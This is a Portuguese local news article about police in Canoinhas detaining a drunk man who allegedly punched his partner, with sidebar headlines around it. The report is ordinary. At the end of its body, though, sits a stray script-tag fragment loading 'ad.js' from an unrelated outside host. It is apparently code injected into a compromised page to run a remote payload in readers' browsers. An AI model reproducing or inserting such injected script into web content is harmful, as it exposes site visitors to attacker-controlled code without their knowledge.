InícioDestaqueMulher é Agredida Por Companheiro

Mulher é Agredida Por Companheiro

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

No sábado, 29, por volta das 23h25, equipes da PM de Canoinhas estavam em apoio à uma ocorrência na Rodovia BR 280, quando no local compareceu uma feminina, a qual estava chorando e com uma lesão na boca. Segundo a mulher a lesão era resultado de um soco que acabará de levar de seu amasio, em uma discussão por motivo fútil.

 

 

De pronto a equipe PM deslocou e conseguiu abordar o homem nas proximidades, o mesmo estava conduzido o veículo GM Vectra, na Rua SÉRGIO GAPSKI.

 

 

Durante o procedimento de abordagem e busca pessoal foi constatado que o homem apresentava visíveis sinais de embriaguez, com forte odor etílico, olhos vermelhos e dificuldade no equilíbrio, sendo oferecido a este o teste de alcoolemia e o mesmo recusou. Diante dos fatos foi realizado o alto de constatação de embriaguez e conduzidas as partes para a Delegacia de Polícia Civil para procedimentos necessários…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.